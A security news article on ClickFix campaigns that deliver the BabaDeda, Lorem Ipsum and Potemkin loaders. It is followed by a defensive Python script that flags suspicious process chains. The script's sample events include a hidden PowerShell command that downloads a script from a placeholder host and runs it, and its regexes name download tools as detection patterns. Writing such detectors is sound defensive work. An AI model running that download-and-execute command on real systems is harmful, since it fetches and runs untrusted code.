ClickFix Campaigns Expand Malware Delivery Through New Loaders And Fake Update Lures

Cybersecurity researchers have identified a series of evolving ClickFix campaigns that are being used to distribute multiple malware loaders, including BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. According to separate analyses published by Morphisec, BlueVoyant, and Huntress, threat actors are increasingly relying on social engineering techniques and deceptive update prompts to compromise systems and deliver a range of malicious payloads. The campaigns demonstrate how attackers continue to adapt their delivery mechanisms by combining user manipulation with sophisticated malware frameworks capable of deploying information stealers, remote access tools, backdoors, and ransomware-related components. Researchers noted that these campaigns target both individuals and organisations across multiple sectors, highlighting the growing use of ClickFix techniques as an initial access method for cybercriminal operations.

One of the campaigns analysed by Morphisec involves BabaDeda Loader, which was observed targeting organisations in the education and financial sectors during April 2026. Researchers reported that the attack begins with a ClickFix social engineering lure that convinces users to execute malicious PowerShell commands. Once activated, the loader uses a combination of hidden PowerShell execution, in-memory shellcode, DLL side-loading, and external payload storage techniques to evade detection while deploying additional malware. The loader is designed to gather information about the host system, conduct security-related checks, and avoid execution on systems located in Russia or Belarus before retrieving and launching its primary payload. Investigators found that malware delivered through BabaDeda Loader can collect detailed system information, extract browser credentials, cookies, browsing history, and encryption keys, capture screenshots, execute commands, and establish encrypted communication channels with command-and-control infrastructure. Researchers also observed another attack chain leveraging external storage files to conceal payloads used to deploy malware families such as DanaBot and SectopRAT. This modular design allows attackers to separate storage, delivery, and execution functions, making forensic analysis and detection more challenging.

BlueVoyant researchers identified a separate ClickFix campaign distributing the newly documented Lorem Ipsum Loader through compromised WordPress websites spanning industries such as architecture, legal services, and construction technology. Unlike previous campaigns that relied on malicious Microsoft Teams installers distributed through fake download portals, the operators behind Lorem Ipsum Loader shifted to ClickFix-based delivery methods after actions targeting malware signing operations disrupted earlier tactics. In these attacks, victims are presented with fraudulent Microsoft Edge security update prompts that encourage them to execute malicious commands. The process downloads a ZIP archive and an outdated Node.js version, which then launches JavaScript-based payloads designed to establish persistence and deploy the loader. Researchers attributed the activity with high confidence to a financially motivated threat actor known as Vanilla Tempest, also referred to as Rapid Brigantine. The loader ultimately retrieves a backdoor from attacker-controlled social media profiles and supports the delivery of additional payloads associated with ransomware operations, including those linked to the Rhysida malware family. Security researchers noted that the shift demonstrates how threat actors rapidly adapt their techniques when existing delivery methods become ineffective.

Huntress researchers also documented a sophisticated ClickFix campaign involving a previously unknown loader called Potemkin. In this attack chain, victims are directed to install a malicious MSI package that deploys the loader through an HTML Application payload. Potemkin uses a domain generation algorithm to locate command-and-control infrastructure and loads follow-on modules directly into memory. The loader serves as a delivery mechanism for EtherRAT and RMMProject, tools capable of remote screen control, browser credential theft, screenshot capture, script execution, and additional system manipulation activities. Researchers observed attackers conducting hands-on-keyboard operations after gaining access, including modifying Microsoft Defender settings, creating reverse tunnels, establishing persistence mechanisms, and moving laterally across networks. The findings underscore the continued effectiveness of ClickFix attacks, which rely on convincing users to execute commands that appear legitimate. Security experts emphasise that these campaigns succeed because they exploit trust and routine user behaviour rather than relying solely on software vulnerabilities. As ClickFix techniques continue to evolve across Windows and macOS environments, organisations are being urged to strengthen user awareness, review security controls, and remain vigilant against deceptive prompts that encourage the execution of unexpected commands.
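The three chains described above share a common detection opportunity: each starts with a process that a user or installer launches by hand (PowerShell from a ClickFix prompt, an HTML Application from an MSI, or an outdated Node.js build running a script from a user-writable folder). The following is an added example, not code from any of the cited reports, showing how a defender might run simple parent/child heuristics over process-creation events. The event format, the sample events, the rule names and the assumption that the HTA payload is hosted by mshta.exe are all this example's own constructions.

```python
"""Heuristic triage of process-creation events for ClickFix-style delivery chains.

Everything here is constructed for illustration: the event records are not
taken from any vendor telemetry, and the rules are a starting point for
tuning, not a signature for any specific loader.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # full command line of the created process


# Constructed sample events. Paths and hosts are placeholders (.invalid TLD).
SAMPLE_EVENTS = [
    # A Win+R / Run-dialog launch: explorer.exe is the parent, window hidden, download cradle.
    ProcEvent("explorer.exe", "powershell.exe",
              'powershell.exe -w hidden -nop -c "iwr http://example.invalid/a.ps1 | iex"'),
    # An MSI installer handing off to an HTML Application (assumed mshta.exe host).
    ProcEvent("msiexec.exe", "mshta.exe",
              "mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\setup.hta"),
    # A Node.js binary dropped into a temp folder and run against a script there.
    ProcEvent("powershell.exe", "node.exe",
              "C:\\Users\\u\\AppData\\Local\\Temp\\node\\node.exe "
              "C:\\Users\\u\\AppData\\Local\\Temp\\run.js"),
    # Benign: an admin running a script interactively with a visible window.
    ProcEvent("explorer.exe", "powershell.exe",
              "powershell.exe -File C:\\Scripts\\backup.ps1"),
    # Benign: a normal service host.
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

# -w hidden / -WindowStyle Hidden: the "hidden PowerShell execution" the reports describe.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Common cmdlets and tools used to fetch a second stage from the command line.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b", re.I)
# User-writable locations where a dropped interpreter or script is unusual for managed software.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Downloads|Public)\\", re.I)


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every heuristic the event triggers (empty list if none)."""
    hits = []
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline
    if parent == "explorer.exe" and image == "powershell.exe":
        if HIDDEN_WINDOW.search(cmd):
            hits.append("user-launched hidden PowerShell")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("user-launched PowerShell download cradle")
    if parent == "msiexec.exe" and image == "mshta.exe":
        hits.append("MSI installer spawning HTA host")
    if image == "node.exe" and USER_WRITABLE.search(cmd):
        hits.append("Node.js run from user-writable path")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return only the events that triggered at least one heuristic, with their hits."""
    flagged = []
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged.append((ev, hits))
    return flagged


if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"{ev.parent} -> {ev.image}: {', '.join(hits)}")
```

Two of the constructed events are deliberately benign so the rules can be checked for false positives: an interactive PowerShell launch with a visible window and no download cradle is not flagged, and neither is a normal service host. In practice these heuristics would be fed from Sysmon event 1 or Windows event 4688 data (with command-line logging enabled) and tuned against the environment's own baseline before being promoted to alerts.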
